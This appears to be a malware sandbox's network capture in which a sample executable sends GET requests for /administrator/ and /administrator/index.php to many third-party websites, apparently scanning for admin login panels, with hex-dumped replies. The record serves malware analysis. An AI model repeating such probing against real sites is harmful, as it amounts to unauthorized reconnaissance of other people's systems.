73 20 6e 65 63 65 73 73 61 72 79 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 2e 20 48 65 72 65 20 61 72 65 20 74 68 65 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></title><script src="https://www.google.com/adsense/domains/caf.js?abp=1" type="text/javascript"></script><noscript><style>#content-main{display:none}</style><div>For full functionality of this site it is necessary to enable JavaScript. Here are the <a target="_blank" rel="noopener noreferrer" href="https://
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.380182981 CET216INData Raw: 77 77 77 2e 65 6e 61 62 6c 65 2d 6a 61 76 61 73 63 72 69 70 74 2e 63 6f 6d 2f 22 3e 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 69 6e 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77
                                                                                                                                                                                                    Data Ascii: www.enable-javascript.com/">instructions how to enable JavaScript in your web browser</a>.</div></noscript><script type="application/javascript">window.LANDER_SYS
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.380198002 CET507INData Raw: 54 45 4d 3d 22 50 57 22 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3d 76 6f 69 64 20 30 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70
                                                                                                                                                                                                    Data Ascii: TEM="PW"</script><script type="text/javascript">var abp=void 0</script><script type="text/javascript" src="/px.js?ch=1&abp=1"></script><script type="text/javascript" src="/px.js?ch=2&abp=1"></script><script defer="defer" src="https://img1.wsim
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.383028984 CET354OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: gmailvz.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: traffic_target=gd; caf_ipaddr=10.116.88.101; country=; city=""
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://gmailvz.com/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.395849943 CET507INData Raw: 54 45 4d 3d 22 50 57 22 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3d 76 6f 69 64 20 30 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70
                                                                                                                                                                                                    Data Ascii: TEM="PW"</script><script type="text/javascript">var abp=void 0</script><script type="text/javascript" src="/px.js?ch=1&abp=1"></script><script type="text/javascript" src="/px.js?ch=2&abp=1"></script><script defer="defer" src="https://img1.wsim
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.482815981 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: openresty
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 1177
                                                                                                                                                                                                    Last-Modified: Mon, 13 Nov 2023 23:35:06 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "6552b2aa-499"
                                                                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_TpTCkQnjIM8WoRaLl4gRKl5Nuh1La0LruAArh+H5Yso2IZxoq03VJSdWQ7GcckcP6PoaRdKPNo1aAf1js52uqA
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Set-Cookie: caf_ipaddr=10.116.88.101;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 63 6f 6e 74 65 6e 74 2d 6d 61 69 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 3e 46 6f 72 20 66 75 6c 6c 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 6f 66 20 74 68 69 73 20 73 69 74 65 20 69 74 20 69 73 20 6e 65 63 65 73 73 61 72 79 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 2e 20 48 65 72 65 20 61 72 65 20 74 68 65 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></title><script src="https://www.google.com/adsense/domains/caf.js?abp=1" type="text/javascript"></script><noscript><style>#content-main{display:none}</style><div>For full functionality of this site it is necessary to enable JavaScript. Here are the <a target="_blank" rel="noopener noreferrer" href="https://
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.482831955 CET216INData Raw: 77 77 77 2e 65 6e 61 62 6c 65 2d 6a 61 76 61 73 63 72 69 70 74 2e 63 6f 6d 2f 22 3e 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 69 6e 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77
                                                                                                                                                                                                    Data Ascii: www.enable-javascript.com/">instructions how to enable JavaScript in your web browser</a>.</div></noscript><script type="application/javascript">window.LANDER_SYS
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.482846975 CET507INData Raw: 54 45 4d 3d 22 50 57 22 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3d 76 6f 69 64 20 30 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70
                                                                                                                                                                                                    Data Ascii: TEM="PW"</script><script type="text/javascript">var abp=void 0</script><script type="text/javascript" src="/px.js?ch=1&abp=1"></script><script type="text/javascript" src="/px.js?ch=2&abp=1"></script><script defer="defer" src="https://img1.wsim
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.495923996 CET507INData Raw: 54 45 4d 3d 22 50 57 22 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3d 76 6f 69 64 20 30 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70
                                                                                                                                                                                                    Data Ascii: TEM="PW"</script><script type="text/javascript">var abp=void 0</script><script type="text/javascript" src="/px.js?ch=1&abp=1"></script><script type="text/javascript" src="/px.js?ch=2&abp=1"></script><script defer="defer" src="https://img1.wsim


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    25192.168.2.455074116.202.203.176806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.297380924 CET232OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: eco-landeck.at
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.772099018 CET632INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Set-Cookie: cf3029587e3a3d4981114230eb79f8bf=uv13klcgs3ue90fr38be2g1fqe; path=/; secure; HttpOnly
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Location: https://eco-landeck.at/administrator/
                                                                                                                                                                                                    Last-Modified: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Strict-Transport-Security: max-age=63072000


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    26192.168.2.455099185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.300971985 CET231OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.480734110 CET725INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Content-Length: 323
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Location: https://grantstech.io/administrator/
                                                                                                                                                                                                    Cache-Control: max-age=0
                                                                                                                                                                                                    Expires: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    X-Cache-Status: MISS
                                                                                                                                                                                                    X-Cache-Key: http://grantstech.io/administrator/
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://grantstech.io/administrator/">here</a>.</p><hr><address>Apache/2.4.56 (Debian) Server at grantstech.io Port 80</address></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    27192.168.2.455104109.168.109.224806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.369013071 CET236OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: americanrecords.it
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.556797028 CET430INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Content-Length: 184
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 b6 45 e3 db 4b e1 e2 71 76 e6 9b 59 ba 4b af 09 bf d7 19 9c f9 a5 84 ba 39 95 45 02 c1 1e b1 c8 78 8e 98 f2 74 73 8e 61 84 98 55 01 23 54 b9 a1 67 54 c9 56 2c c2 75 ae 97 2c 8e 62 a8 b4 83 5c cf a3 a0 b8 1d 09 c5 35 44 1f 5a 7c 3d 77 60 7f 99 45 11 3a 31 ae 24 18 f9 9a a5 75 52 40 73 2b 01 5b 31 74 63 67 9d 69 9d 36 08 9f d6 c2 b8 70 4f cf 81 1e c1 a9 ce 82 95 e6 2d 4d 48 71 f2 3b eb c2 d2 e9 3f 23 3f 1d 55 df e9 d4 00 00 00
                                                                                                                                                                                                    Data Ascii: M0},MI)(EKqvYK9ExtsaU#TgTV,u,b\5DZ|=w`E:1$uR@s+[1tcgi6pO-MHq;?#?U
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.560234070 CET296OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: americanrecords.it
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://americanrecords.it/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.750118971 CET437INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Content-Length: 191
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 39 0e c2 30 10 45 7b 9f 62 48 4f 26 20 4a cb 05 24 88 48 61 11 32 05 65 90 07 d9 12 b1 83 ed b0 dc 1e 07 1a ca bf cc fb c3 27 e5 7e 25 cf 87 0a 36 72 db c0 e1 b4 6c ea 15 64 53 c4 ba 92 6b c4 52 96 bf 64 9e 17 88 d5 2e 13 8c eb d8 dd 04 d7 d4 aa 24 a2 89 37 12 8b 62 01 3b 17 61 ed 06 ab 38 fe 4c c6 f1 5b e2 17 a7 de e3 dd 4c fc 75 92 62 bc 17 52 13 78 ba 0f 14 22 29 38 1d 1b c0 56 75 c6 9a 10 7d 1b 9d 47 63 15 bd f2 5e f7 f0 6c 03 d8 04 b8 8e 00 70 16 a2 36 01 02 f9 07 f9 9c 63 3f 0e 7e a7 12 7c 7c 91 7d 00 cc 66 b7 ab dd 00 00 00
                                                                                                                                                                                                    Data Ascii: M90E{bHO& J$Ha2e'~%6rldSkRd.$7b;a8L[LubRx")8Vu}Gc^lp6c?~||}f


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    28192.168.2.45516115.235.14.141806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.370692015 CET229OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: unaj.edu.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.477143049 CET276INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Content-Length: 242
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Location: https://unaj.edu.pe/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.477240086 CET296INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://unaj.edu.pe/administrator/">here</a>.</p></body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.770951986 CET283OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: unaj.edu.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://unaj.edu.pe/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.877490997 CET285INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Content-Length: 251
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Location: https://unaj.edu.pe/administrator/index.php
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.877502918 CET305INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://unaj.edu.pe/administrator/index.php">here</a>.</p></body>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    29192.168.2.451768148.66.138.193806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.389609098 CET232OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: octetpowers.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.720406055 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                                    Connection: Upgrade
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Expires: 0
                                                                                                                                                                                                    Content-Length: 1699
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>File Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" ><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">body { background-color: #eee;}body, h1, p { font-family: "Helvetica Neue", "Segoe UI", Segoe, Helvetica, Arial, "Lucida Grande", sans-serif; font-weight: normal; margin: 0; padding: 0; text-align: center;}.container { margin-left: auto; margin-right: auto; margin-top: 177px; max-width: 1170px; padding-right: 15px; padding-left: 15px;}.row:before, .row:after { display: table; content: " ";}.col-md-6 { width: 50%;}.col-md-push-3 { margin-left: 25%;}h1 { font-size: 48px; font-weight: 300; margin: 0 0 20px 0;}.lead { font-size: 21px; font-weight: 200; margin-bottom: 20px;}p { margin: 0 0 10px;}a { color: #3282e6; text-decoration: none;}</style></head><body><div class="container te
